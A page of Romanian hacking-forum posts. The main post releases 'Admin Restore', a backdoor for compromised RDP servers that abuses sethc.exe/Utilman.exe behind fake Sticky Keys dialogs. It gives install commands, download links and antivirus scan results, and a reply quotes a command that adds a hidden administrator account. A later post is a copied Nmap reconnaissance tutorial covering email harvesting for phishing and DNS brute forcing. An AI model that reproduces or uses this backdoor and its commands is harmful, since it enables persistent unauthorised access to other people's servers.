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  1. [RST] Admin Restore v1.2 M-am folosit de sethc.exe/Utilman.exe doar ca folosesc alta metoda de instalare... nici un fel de "Take Ownership" sau "File Overwrite". Am creat mesaje false pentru High Contrast / Sticky Keys : Windows Vista/Server 2008/Windows 7/Server 2008 R2 : Desktop High Contrast Desktop Sticky Keys Winlogon Sticky Keys Winlogon High Contrast Windows XP/Windows Server 2003 : Desktop High Contrast Desktop Sticky Keys Winlogon Sticky Keys Winlogon High Contrast Cum se foloseste ? In WinLogon apasam de 5x SHIFT sau ALT (Stanga) + SHIFT (Stanga) + PRINT SCREEN, va aparea unul din mesajele de mai sus ... apasam Ok/Cancel/Yes/No dupa care apasam TAB + SHIFT + ALT + CONTROL + DEL (nu trebuiesc apasate simultan) si va aparea consola de logare : da, dupa cum vedeti folosesc un "NumPad", doar numere pentru ca in v1.0 & v1.1 (desi nu le-am publicat) pe RDP-uri de Iran apasam Y spre ex si in textbox se tasta Z, NumPad-ul a rezolvat problema. Daca apasam Login fara sa tastam nimic Consola se va inchide, daca gresim parola de 5x consola se va inchide, iar daca tastam parola corecta va aparea asta : Avem un Downloader ce salveaza in %TEMP% , putem accesa informatia dupa descarcare prin CMD.exe, un mic Task Run pentru a porni cmd.exe si nu numai .., putem schimba setarile mesajelor false ... si pentru ca am citit postul utilizatorului sllrdp din Market, defapt user567 cu am adaugat si optiunea de a schimba parola dupa instalare ... Daca dam click pe bannerul RST va aparea un mic "disclaimer" : iar daca dam click pe "RST ... Maximus Spide ... Center" va aparea un About : Cum se instaleaza ? In primul rand trebuie sa aveti drept de Administrator pe RDP. Installer-ul arata cam asa : Command Line Arguments (pentru iHack.exe nu pentru Install.exe): iHack.exe -i -n:[fisier exe] -pwd:[parola din numere] -h:[sethc.exe/Utilman.exe] -msg:[0/1 unde 0=false si 1=true] Ex : iHack.exe -i -n:csrss.exe -msg:1 -pwd:31337 -h:sethc.exe iHack.exe -iHack va deschide "disclaimer-ul" : Install.exe instaleaza si Msvbvm60.dll (va copia Msvbvm60.dll in directorul unde se va instala iHack.exe), asta pentr ca am intalnit probleme pe unele RDP-uri cu Windows Server 2003 pe ele. O poza din Winlogon (Laptopul meu) http://www.7image.ru/pics/0213/340439811.jpg VIDEO : SCAN : File Info Report Date: 18.02.2013 01:02:29 Link To Scan: http://elementscanner.net//?RE=85539f8891fd8e1dffac2263bebd5808 File Name:iHack.exe File Size: 625664 bytes MD5 Hash: beffce95e5afb14fc38260c07901507a SHA1 Hash: 8e5bacba52013be8cdf4b4b3c0093e5e14eb1736 Status: Clean Total Results: 0/35 AVG Free-Clean. ArcaVir-Clean. Avast 5-Clean. AntiVir (Avira)-Clean. BitDefender-Clean. VirusBuster Internet Security-Clean. Clam Antivirus-Clean. COMODO Internet Security-Clean. Dr.Web-Clean. eTrust-Vet-Clean. F-PROT Antivirus-Clean. F-Secure Internet Security-Clean. G Data-Clean. IKARUS Security-Clean. Kaspersky Antivirus-Clean. McAfee-Clean. MS Security Essentials-Clean. ESET NOD32-Clean. Norman-Clean. Norton Antivirus-Clean. Panda Security-Clean. A-Squared-Clean. Quick Heal Antivirus-Clean. Solo Antivirus-Clean. Sophos-Clean. Trend Micro Internet Security-Clean. VBA32 Antivirus-Clean. Vexira Antivirus-Clean. Zoner AntiVirus-Clean. Ad-Aware-Clean. BullGuard-Clean. Immunet Antivirus-Clean. K7 Ultimate-Clean. NANO Antivirus-Clean. VIPRE-Clean. File Info Report Date: 17.02.2013 13:02:36 Link To Scan: Scan Result | Element Scanner File Name:Install.exe File Size: 219136 bytes MD5 Hash: aa53152cc4c6567f28022d69aa95f51e SHA1 Hash: 7f83f71aa8a72b2d8cb2ef41f32c0af700b97a29 Status: INFECTED Total Results: 8/35 AVG Free-Clean. ArcaVir-Clean. Avast 5-Clean. AntiVir (Avira)- TR/Crypt.ASPM.Gen. BitDefender- Gen:Heur.ManBat.1. VirusBuster Internet Security-Clean. Clam Antivirus-Clean. COMODO Internet Security-Clean. Dr.Web-Clean. eTrust-Vet-Clean. F-PROT Antivirus-Clean. F-Secure Internet Security- Gen:Heur.ManBat.1. G Data- Gen:Heur.ManBat.1. IKARUS Security- Virus.Win32.VBInject. Kaspersky Antivirus-Clean. McAfee-Clean. MS Security Essentials-Clean. ESET NOD32-Clean. Norman-Clean. Norton Antivirus-Clean. Panda Security-Clean. A-Squared- Virus.Win32.VBInject!IK. Quick Heal Antivirus-Clean. Solo Antivirus-Clean. Sophos-Clean. Trend Micro Internet Security-Clean. VBA32 Antivirus-Clean. Vexira Antivirus-Clean. Zoner AntiVirus-Clean. Ad-Aware-Clean. BullGuard- Gen:Heur.ManBat.1. Immunet Antivirus- Gen:Heur.ManBat.1. K7 Ultimate-Clean. NANO Antivirus-Clean. VIPRE-Clean. Download Link : https://www.dropbox.com/s/t0ilnhb9yzhixbh/Install.zip Parola : rst Sper sa va fie folositor. P.S. Daca gasiti bug-uri/errors va rog lasati un comment sau PM me , descarcati https://www.dropbox.com/s/0hnq4f8q7r0ehsr/detect.exe si lasati ce e in textbox aici (va detecta sistemul de operare). Multumesc P.S.2 Pentru versiuni personalizate PM me. @alinh0; eu chiar am crezut ca este vb de GetAdmin.exe, acel exploit pentru Win Server 2003 (parca) .. ma gandeam ca a aparut o varianta noua a exploit-ului dar tu .... http://www.7image.ru/pics/0213/340464789.png pus pe troll pustiu @begood; am descarcat programul lui alinh0 si l-am rulat pe XP in VMWARE, a fost un troll, probabil nu se astepta sa-l rulez in virtual machine. http://www.7image.ru/pics/0213/340464789.png "are el un exploit in C care deschide un cmd ascuns cu net user RubberDuck mudbath /add && net localgroup 'admtors' RubberDuck /add" probabil nici nu stie ca a gresit comanda ... Update 2/18/2013 : Command Line Arguments Bug Fixed (-msg:0/1 error) Link "permanent": [/FONT]https://rstforums.com/proiecte/AdminRestore.zip
    2 points
  2. poftim : http://trojanforge.com/showthread.php?t=1370
    -1 points
  3. Information Gathering With Nmap Nmap is tool that can perform various activities in a penetration test.The function of NSE (Nmap Scripting Engine) and the scripts that have written so far they can transform Nmap to a multi purpose tool.For example we can use Nmap during the information gathering stage of a penetration test just by using the appropriate scripts.In this article we will examine those scripts and the information that we can extract. One of our first steps it can be to determine the origin of the IP address that our client has given to us.Nmap includes in his database a couple of scripts for this purpose.If we want to run all these scripts we can use the following command as it can be seen in the image below: Nmap – IP Geolocation As we can see the script called an external website (geobytes) in order to determine the coordinates and location of our target. Whois The command Whois can be run directly through the console in Linux environments.However there is a specific script for Nmap that performs the same job and it can be used.This script will return information about the registrar and contact names. Nmap – Whois Email Accounts Email accounts can prove also important in a penetration test as it can be used as usernames,in social engineering engagements (i.e Phishing Attacks)or in a situation where we have to conduct brute force attacks against the mail server of the company.There are two scripts available for this job: http-google-email http-email-harvest The http-google-email script uses the Google Web and Google Groups in order to search for emails about the target host while the http-email-harvest spiders the web server and extracts any email addresses that it discovers.The http-email-harvest is in the official repository of Nmap and the http-google-email script can be downloaded from here. Nmap – Discover Email Accounts Brute Force DNS Records DNS records contains a lot of information about a particular domain which cannot be ignored.Of course there are specific tools for brute forcing DNS records which can produce better results but the dns-brute script can perform also this job in case that we want to extract DNS information during our Nmap scans. Nmap – Brute Forcing DNS Discovering Additional Hostnames We can discover additional hostnames that are based on the same IP address with the nmap script http-reverse-ip.This script can help us to find other web applications that exist on the same web server.It is an external script that can be downloaded from here. Nmap – Reverse IP Conclusion In this article we examined some Nmap scripts (internal and external) that can be used during the information gathering stage of a penetration test and before we start the actual scanning.The information that we have obtained proves that Nmap can perform almost any task with his scripts.If it cannot do something that you want then it is time to write your own Lua scripts and to contribute to the community. Sursa: Information Gathering With Nmap
    -1 points
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